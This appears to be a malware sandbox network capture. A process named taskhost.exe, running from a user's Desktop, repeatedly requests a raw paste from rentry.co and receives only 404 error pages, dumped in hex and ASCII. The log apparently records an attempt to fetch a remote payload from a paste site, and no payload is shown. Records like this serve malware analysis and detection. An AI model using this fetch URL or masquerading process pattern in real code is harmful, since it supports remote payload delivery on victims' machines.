                                                              Date: Fri, 13 Dec 2024 10:49:11 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vo7ztOkbDbrDmzeIPyI2muJ7avP4mI6zI5SZHkc1eA%2BLUAUNVnNwYDRchMJpt6P4ZwT3xqzEsUrJnMnu8fU9KSjsesMwrJzoJCNfUQ3DZuBgWN3vExUqou%2Bxkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1562d768326a52-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1632&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1780487&cwnd=210&unsent_bytes=0&cid=acb32cf043ec59ec&ts=811&x=0"
                                                              2024-12-13 10:49:12 UTC502INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:12 UTC1369INData Raw: 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e
                                                              Data Ascii: eta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.
                                                              2024-12-13 10:49:12 UTC1369INData Raw: 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61
                                                              Data Ascii: es || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('da
                                                              2024-12-13 10:49:12 UTC1220INData Raw: 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20
                                                              Data Ascii: ></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.749800104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:16 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:17 UTC865INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:17 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HMG3ssmp6qYTSfPiMSHGdthhNruBVPNsVGcx7b5P9OHr%2FYiVvmpSv7DmFzXHC2CF60VhqKZwtPovKc2s2qSJUg7KQE2zJT7nrdNOQccZKHTFG17pUHlxVlNkkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1562f75c00c3f3-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1526&min_rtt=1521&rtt_var=580&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1869398&cwnd=190&unsent_bytes=0&cid=71ce6182055a44e3&ts=813&x=0"
                                                              2024-12-13 10:49:17 UTC504INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:17 UTC1369INData Raw: 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f
                                                              Data Ascii: a name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://rentry.co
                                                              2024-12-13 10:49:17 UTC1369INData Raw: 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61
                                                              Data Ascii: || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute('data
                                                              2024-12-13 10:49:17 UTC1218INData Raw: 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 3c
                                                              Data Ascii: /span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script> <
                                                              2024-12-13 10:49:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              4192.168.2.749811104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:21 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:22 UTC873INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:22 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NUzhzd%2FP4pDZoXakiJ6cZfmuf3jSbFkHrC%2FgxvkAipp3s7vWgXlqykUGgj7xn86yUgFqdKgLpT%2BNT9jqSc%2BG1VcPl0gODuu2N%2FmqBdtkj3dpk0Y0okX3b7mitQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f156316cf738cb4-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2007&rtt_var=762&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1426477&cwnd=189&unsent_bytes=0&cid=9bf5b7b002d032e7&ts=823&x=0"
                                                              2024-12-13 10:49:22 UTC496INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:22 UTC1369INData Raw: 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://r
                                                              2024-12-13 10:49:22 UTC1369INData Raw: 2e 6d 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75
                                                              Data Ascii: .matches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribu
                                                              2024-12-13 10:49:22 UTC1226INData Raw: 20 6d 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20
                                                              Data Ascii: mode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              5192.168.2.749823104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:26 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:27 UTC871INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:27 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1wKiZChZkdQPNl4JotC2VIEVHZChdO3yu%2BWcrHMhc14bx8KLileVosDtbTPDVU9aPVxlI4bK8J%2BPBvyqcHLWfuFRpbibjBT%2B1c%2Fz7qq6aOLBogi3rPmliWPLSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              Server: cloudflare
                                                              CF-RAY: 8f1563364ddb41d2-EWR
                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1801357&cwnd=251&unsent_bytes=0&cid=8269f3d10fcaaf1b&ts=797&x=0"
                                                              2024-12-13 10:49:27 UTC498INData Raw: 31 31 36 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 68 74 6d 6c 3e 0a 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e
                                                              Data Ascii: 1164<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" conten
                                                              2024-12-13 10:49:27 UTC1369INData Raw: 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 73 69 74 65 22 20 63 6f 6e 74 65 6e 74 3d 22 40 72 65 6e 74 72 79 5f 63 6f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 73 74 61 74 69 63 2f 69 63 6f 6e 73 2f 35 31 32 2e 70 6e 67 22 20 2f 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e
                                                              Data Ascii: <meta name="twitter:title" content="Rentry.co - Markdown Paste" /> <meta name="twitter:site" content="@rentry_co" /> <meta name="twitter:image" content="https://rentry.co/static/icons/512.png" /> <meta property="og:url" content="https://ren
                                                              2024-12-13 10:49:27 UTC1369INData Raw: 61 74 63 68 65 73 20 7c 7c 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 64 61 72 6b 2d 6d 6f 64 65 22 29 20 3d 3d 20 22 74 72 75 65 22 29 29 3b 3c 2f 73 63 72 69 70 74 3e 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 63 6f 6e 73 74 20 73 63 72 69 70 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 20 63 6f 6e 73 74 20 68 6e 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 20 3d 3d 3d 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 26 26 20 27 72 65 6e 74 72 79 2e 6f 72 67 27 20 7c 7c 20 27 72 65 6e 74 72 79 2e 63 6f 27 3b 20 73 63 72 69 70 74 2e 64 65 66 65 72 20 3d 20 74 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65
                                                              Data Ascii: atches || localStorage.getItem("dark-mode") == "true"));</script>--> <script>const script = document.createElement("script"); const hn = window.location.hostname === 'rentry.org' && 'rentry.org' || 'rentry.co'; script.defer = true; script.setAttribute
                                                              2024-12-13 10:49:27 UTC1224INData Raw: 6f 64 65 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6a 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 6a 73 3f 76 73 73 6f 6e 3d 32 38 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20
                                                              Data Ascii: ode"></span></div> </div> </div> </div> <script src="/static/js/jquery.min.js?vsson=28"></script> <script src="/static/js/bootstrap.min.js?vsson=28"></script>
                                                              2024-12-13 10:49:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              6192.168.2.749839104.26.2.164436504C:\Users\user\Desktop\taskhost.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-13 10:49:31 UTC71OUTGET /ue6sxoup/raw HTTP/1.1
                                                              Host: rentry.co
                                                              Connection: Keep-Alive
                                                              2024-12-13 10:49:32 UTC874INHTTP/1.1 404 Not Found
                                                              Date: Fri, 13 Dec 2024 10:49:32 GMT
                                                              Content-Type: text/html; charset=utf-8
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              vary: Origin
                                                              x-xss-protection: 1; mode=block
                                                              strict-transport-security: max-age=31536000; includeSubDomains
                                                              CF-Cache-Status: DYNAMIC
